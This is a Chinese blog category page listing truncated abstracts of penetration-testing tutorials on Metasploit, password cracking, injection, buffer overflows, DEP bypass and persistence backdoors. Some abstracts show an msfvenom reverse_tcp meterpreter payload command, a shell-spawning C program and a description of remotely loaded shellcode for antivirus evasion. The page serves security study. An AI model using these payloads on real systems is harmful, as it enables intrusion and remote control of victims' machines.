随笔分类 -  《渗透测试与网络安全实战》

摘要:1.下载证书。Impersonate_SSL模块,下载指定网站的证书。 msf6> use auxiliary/gather/impersonate_ssl msf6 auxiliary(gather/impersonate_ssl) > set rhost www.baidu.com msf6 a 阅读全文
posted @ 2021-06-29 12:45 lyshark 阅读(1002) 评论(0) 推荐(0) 编辑
摘要:Hydra(九头蛇海德拉)是希腊神话之中的一个怪兽,以九个头闻名于世,在Kali中hydray(hai der rua) 是默认被安装的,该工具是密码破解的老司机,可以破解各种登录密码,非常怪兽,但是其稳定性不是很好。 阅读全文
posted @ 2021-05-30 10:46 lyshark 阅读(912) 评论(0) 推荐(0) 编辑
摘要:关于请求头中注入问题的演示,这里我写了一些测试案例,用来测试请求头中存在的问题。我们常见的会发生注入的点有 Referer、X-Forwarded-For、Cookie、X-Real-IP、Accept-Language、Authorization,User-Agent HTTP Referer:是 阅读全文
posted @ 2020-08-12 10:10 lyshark 阅读(2344) 评论(0) 推荐(0) 编辑
摘要:将生成的 shellcode 放到 web 服务器上,本地不保存恶意代码,本地只负责加载到内存运行,这样可以很好的躲过查杀。 阅读全文
posted @ 2020-06-02 18:05 lyshark 阅读(1076) 评论(0) 推荐(0) 编辑
摘要:计算机数字取证分为内存取证和磁盘取证,活取证与死取证,不管是那种取证方式,都应尽量避免破环犯罪现场,例如通过内存转储工具对内存进行快照,通过磁盘克隆工具对磁盘进行克隆,方便后期的分析工作,这里将研究内存的取证技术中的活取证。 工具地址: https://github.com/volatilityfo 阅读全文
posted @ 2020-03-13 11:10 lyshark 阅读(2564) 评论(0) 推荐(0) 编辑
摘要:Nmap扫描器,支持生成扫描报告,配合转换模板,可实现自定义转换报告,非常方便。 扫描报告,可以生成如下格式,这是Nmap中自带的格式。 nmap -PR -oX lyshark.xml 192.168.1.0/24 # 以XML格式输出扫描结果 nmap -PR -oN lyshark.log 1 阅读全文
posted @ 2020-02-22 20:07 lyshark 阅读(4658) 评论(0) 推荐(0) 编辑
摘要:通常情况下栈溢出可能造成的后果有两种,一类是本地提权另一类则是远程执行任意命令,通常C/C++并没有提供智能化检查用户输入是否合法的功能,同时程序编写人员在编写代码时也很难始终检查栈是否会发生溢出,这就给恶意代码的溢出提供了的条件,利用溢出,攻击者可以控制程序的执行流,从而控制程序的执行过程并实施恶意行为,而微软的DEP保护机制则可使缓冲区溢出失效,不过利用ROP反导技术依然是可被绕过的,接下来将具体分析如何利用ROP技术绕过DEP保护机制。 阅读全文
posted @ 2020-02-21 15:55 lyshark 阅读(2913) 评论(0) 推荐(2) 编辑
摘要:netcat 黑客们的瑞士军刀,虽然小巧但是其功能一点也不弱,并且该工具天生免杀,值得你去尝试。 阅读全文
posted @ 2020-02-13 10:01 lyshark 阅读(756) 评论(0) 推荐(0) 编辑
摘要:Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。 阅读全文
posted @ 2020-01-13 20:27 lyshark 阅读(1634) 评论(0) 推荐(0) 编辑
摘要:APT是指高级持续性威胁, 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,APT攻击的原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。 高级持续渗透后门是指高级持续性后渗透权限长期把控,利用先进的后渗透手段对特定目标进行长期持续性维持权限的后攻击形式,高级持续渗透后门的原理相对于其他后门形式更为高级和先进,其高级性主要体现在持续渗透后门在发动持续性权限维持之前需要对攻击对象的业务流程和目标系统进行精确的收集并量身制定目标后门。 阅读全文
posted @ 2019-10-09 19:47 lyshark 阅读(1632) 评论(0) 推荐(0) 编辑
摘要:栈溢出是缓冲区溢出中最为常见的一种攻击手法,其原理是,程序在运行时栈地址是由操作系统来负责维护的,在我们调用函数时,程序会将当前函数的下一条指令的地址压入栈中,而函数执行完毕后,则会通过ret指令从栈地址中弹出压入的返回地址,并将返回地址重新装载到EIP指令指针寄存器中,从而继续运行,然而将这种控制程序执行流程的地址保存到栈中,必然会给栈溢出攻击带来可行性。 阅读全文
posted @ 2019-08-30 11:43 lyshark 阅读(1174) 评论(0) 推荐(0) 编辑
摘要:`模糊测试(Fuzzing)`,是用于`漏洞挖掘`的探测工作,主要用于`发现`那些函数存在`漏洞`,通过向目标系统提供`非预期的输入`并监视异常结果来发现软件漏洞的方法,其原理主要是通过`输入`大量数据,发现程序中`存在的问题`.可以通过使程序某些内容溢出出现异常,或者输入的是程序规定的范围内的数据结果出现异常,从而找出程序的bug. 阅读全文
posted @ 2019-08-30 11:25 lyshark 阅读(1850) 评论(0) 推荐(0) 编辑
摘要:1.使用C语言编写一个获得系统Shell的小程序。 #include <unistd.h> int main() { char * shell[2]; shell[0]="/bin/sh"; shell[1]=NULL; execve(shell[0],shell,NULL); } 编译并运行后,能 阅读全文
posted @ 2019-08-29 19:13 lyshark 阅读(1201) 评论(0) 推荐(0) 编辑
摘要:在黑客圈子中,基于内存攻击技术的攻击手段在随着时代的变化而不断发展着,内存攻击是指通过利用软件的安全漏洞,构造恶意的输入,从而使正常程序造成拒绝服务或者是远程获得控制权,内存攻击技术中最先登上历史舞台的就是缓冲区溢出漏洞,时至今日能够被广泛利用的 60% 以上的高危漏洞(CVE)都属于缓冲区溢出,接下来我将总结缓冲区溢出的相关知识点。 阅读全文
posted @ 2019-08-29 09:00 lyshark 阅读(1021) 评论(0) 推荐(0) 编辑
摘要:信息收集(Information Gathering),信息收集是指通过各种方式获取所需要的信息,在整个渗透测试环节中,信息搜集是整个渗透过程中最为重要的一环,信息搜集可占据整个渗透测试80%左右的工作量,同样的如果尽可能搜集更多的信息,对于后期的渗透工作是非常有帮助的,本章将针对内网(域)环境进行信息的搜集工作,以作为学习笔记收录。 阅读全文
posted @ 2019-08-24 17:23 lyshark 阅读(1525) 评论(0) 推荐(1) 编辑
摘要:信息收集(Information Gathering),信息收集是指通过各种方式获取所需要的信息,在整个渗透测试环节中,信息搜集是整个渗透过程中最为重要的一环,信息搜集可占据整个渗透测试80%左右的工作量,同样的如果尽可能搜集更多的信息,对于后期的渗透工作是非常有帮助的,本章将针对Web网站进行信息的搜集工作,以作为学习笔记收录。 阅读全文
posted @ 2019-08-24 07:42 lyshark 阅读(934) 评论(0) 推荐(0) 编辑
摘要:Acunetix是全球排名前三的漏洞发现厂商,其全称(Acunetix Web Vulnerability Scanner)AWVS是业内领先的网络漏洞扫描器,其被广泛赞誉为包括最先进的SQL注入和XSS黑盒扫描技术。它能够自动爬行网站,并执行黑盒和灰盒测试技术,能够发现危险的漏洞。AWVS能够针对SQL注入、XSS、XXE、SSRF、主机头注入以及4500多个其他web漏洞执行精确的测试,并通过内置的Web管理页面轻松完成管理工作,同时能够生成非常完善的渗透报告。 阅读全文
posted @ 2019-08-23 18:06 lyshark 阅读(14028) 评论(0) 推荐(1) 编辑
摘要:Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术,同时也包含了数种系统管理工具、简易且一致的语法,提升管理者的管理能力,自Windows 7 开始一直到Windows 10 包括服务器Windows Server 系统中,都将内置 PowerShell,其可作为白名单的一种绕过方式,也让渗透变得更加有趣。 阅读全文
posted @ 2019-08-15 19:54 lyshark 阅读(1166) 评论(0) 推荐(0) 编辑
摘要:1.生成ShellCode [root@localhost ~]# msfvenom -a x86 --platform Windows \ > -p windows/meterpreter/reverse_tcp \ > -b '\x00\x0b' LHOST=192.168.1.30 LPORT 阅读全文
posted @ 2019-08-15 09:18 lyshark 阅读(629) 评论(0) 推荐(0) 编辑
摘要:Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。 阅读全文
posted @ 2019-08-14 15:39 lyshark 阅读(1329) 评论(0) 推荐(0) 编辑


loading... | loading...
博客园 - 开发者的网上家园